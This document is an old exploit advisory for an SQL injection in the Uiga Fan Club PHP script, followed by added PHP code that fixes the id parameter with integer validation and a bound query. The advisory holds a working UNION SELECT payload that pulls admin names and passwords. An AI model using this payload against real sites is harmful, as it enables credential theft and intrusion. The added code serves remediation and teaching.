Uiga Fan Club SQL Injection Vulnerability
Posted on 22 March 2010
# Exploit Title: Uiga Fan Club SQL Injection Vulnerability
# Date: 22/03/2010
# Author: Sioma Labs
# Site : http://www.scriptdevelopers.net/products/ufc.html
# Software Link: http://www.scriptdevelopers.net/download/uigafanclub.zip
# Version: N/A
# Tested on: Win (Wamp)
# CVE : N/A

Exploit :
http://site/index.php?view=photos&id=[SQLi]

Example :
http://localhost/uigafan/index.php?view=photos&id=-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--

# Inj3ct0r.com [2010-03-22]
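
Added example (not part of the original advisory and not the vendor's code): the injectable id parameter of index.php?view=photos handled with strict integer validation and a bound query parameter, so the value never becomes SQL text. The table layout, the function names and the in-memory SQLite database standing in for the application's MySQL database are assumptions.

```php
<?php
// Hypothetical schema and helpers; only the parameter name `id`, the view
// name `photos` and the admin column names come from the advisory.

function make_demo_db(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Five columns, matching the column count of the advisory's UNION SELECT.
    $db->exec('CREATE TABLE photos (id INTEGER PRIMARY KEY, title TEXT, file TEXT, added TEXT, views INTEGER)');
    $db->exec('CREATE TABLE admin (admin_id INTEGER, admin_name TEXT, admin_password TEXT)');
    // Constructed sample rows.
    $db->exec("INSERT INTO photos VALUES (7, 'Concert', 'c.jpg', '2010-03-01', 3)");
    $db->exec("INSERT INTO admin VALUES (1, 'demo-admin', 'constructed-value')");
    return $db;
}

// Accept only a positive decimal integer; everything else is rejected.
function parse_photo_id($raw): ?int {
    if (!is_string($raw)) {
        return null; // e.g. id[]=1 arrives as an array
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function fetch_photo(PDO $db, $rawId): ?array {
    $id = parse_photo_id($rawId);
    if ($id === null) {
        return null; // caller answers 400/404 and does not echo a database error
    }
    // The value is bound as an integer, never concatenated into the statement.
    $stmt = $db->prepare('SELECT id, title, file, added, views FROM photos WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = make_demo_db();
// The id value from the advisory's example URL, after URL decoding.
$fromAdvisory = '-7 Union Select 1,2,group_concat(admin_id,0x3a,admin_name,0x3a,admin_password),4,5 from admin--';
var_dump(fetch_photo($db, '7'));            // legitimate request
var_dump(fetch_photo($db, $fromAdvisory));  // rejected before any query is built
```

Validation alone would stop this particular value; the bound parameter is what keeps the query safe if the validation is later loosened or bypassed.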